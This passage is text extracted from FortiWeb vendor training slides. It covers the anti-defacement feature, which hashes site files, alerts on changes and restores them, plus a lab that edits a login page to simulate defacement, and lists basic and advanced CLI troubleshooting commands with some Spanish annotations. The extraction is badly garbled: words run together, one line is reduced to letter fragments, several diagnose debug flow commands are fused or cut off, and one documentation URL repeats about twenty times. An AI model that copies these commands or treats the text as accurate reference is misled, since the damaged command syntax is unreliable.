Pay special attention to the Parameters Validation rules
Configuring Auto-Learning > Review generated configuration
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
232/362
Anti-Defacement
Web Defacement
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
233/362
Tool
A website defacement is an attack on a website that
Web Defacement
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
234/362
changes the visual appearance of the site or awebpage
FortiWeb has a Anti-Defacement tool that recognizes
FortiWeb Anti-Defacement Tool
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
235/362
when a web site file has been changed and reactsaccordingly
1. Backup and creates a hash for each sites objects
2. Monitor each object comparing their hash with theones registered
3. If any change:
Alert and manually recover changed file Automatically recover changed file
Configure Anti-Defacement Tool
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
236/362
1. Go to Web Anti-Defacement
2. Create New
Configure Anti-Defacement Tool > Create Policy
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
237/362
Go to Web Site withAnti-Defacement
& Create New Policy
Name Policy
Set Monitor Intervals
Enable Auto Restore
Click OK to save Test Connection
o Enable Monitoring
o Define folder to monitor
o Specify credentials usedfor monitoring
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
238/362
Configure Anti-Defacement Tool > Review (2)
Inspect the policy details and statistics
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
239/362
Configure Anti-Defacement Tool > Review (3)
Inspect the list protect files and attributes
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
240/362
1. Edit the login.htmlfile and change something in its content
Configure Anti-Defacement Tool > Review (4)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
241/362
2. Wait until you see that one file has detected as changed
3. Inspect changes by clicking on the Total Changed filesnumber
4. Access the XBANK site and you will see the defaced site
Review log file and verify the defacement event
Configure Anti-Defacement Tool (8)
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
242/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
243/362
FortiWeb BasicTroubleshooting
Get System Status
# get system status
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
244/362
Get System Performance
# get system performance
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
245/362
Get System Global
# get system global
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
246/362
System Top
# diag system top Proceso, id del Proceso, estado, C d
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
247/362
Consumo de cpu Consumo de memoria
Si presionas q te ordena Consumo de procesador o memoria
# diag system kill
Diag system kill (id del proceso)
System Flash List
# diag system flash list Muestra las diversas particiones y las versiones corriendo en las mismas. SE muestran cuando se
t li l i j l i t li bi d i t i l
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
248/362
actualiza el equipo por ejemplo si no se actualiza bien se puede regresar a una version anterior con lacopia qeu el equipo gardo a una version posterior.
Execute Options
# execute ?
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
249/362
El traceroute al modificar el ping-options tambien se hace respecto al source del ping.
Cuando se da de alta un fortigate o fortiweb: para evitar el tiempo de espera de registro en fortiguard utilizar:
Exec-update-av
exec update-ips
Exec update-now
El reseteo del disco de logs pide reinicio.
Execute Ping
# execute ping
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
250/362
Execute Traceroute
# execute traceroute
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
251/362
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
252/362
FortiWeb AdvancedTroubleshooting
Diagnose Commands
CLI command trees: diagnose, get
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
253/362
Commonly used sub-branches
Numerous options/parameters viewed with ?
diag network sniffer
diag system
diag debug
diag application
get log
get sys
Diagnose Debug Flow
# diagnose debug flow filter cleardiagnose debug flow policy client-ip di d b fl li di ti {b th | li t t | t
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.html -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
254/362
diagnose debug flow policy direction {both | client-to-server | server-to-client}diagnose debug flow policy server-ip
diagnose debug flow filter server-ip 2.2.128 (ip-fisica/real)diagnose debug flow show module-process-detail ondiagnose debug flow trace startdiagnose debug enable
Diagnose Debug Flow
We must see:
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.html -
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
255/362
Crash Log
# diagnose debug crashlog read
-
7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1
256/362
Use this command to show crash logs from application proxies thathave call back traces, segmentation faults, or memory register dumps,
or to delete the crash log.
Diagnose Debug Application
# diagnose debug application autolearn [{-1 | 0}]
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_application_autolearn.htmlhttp://docs.fortinet.com/f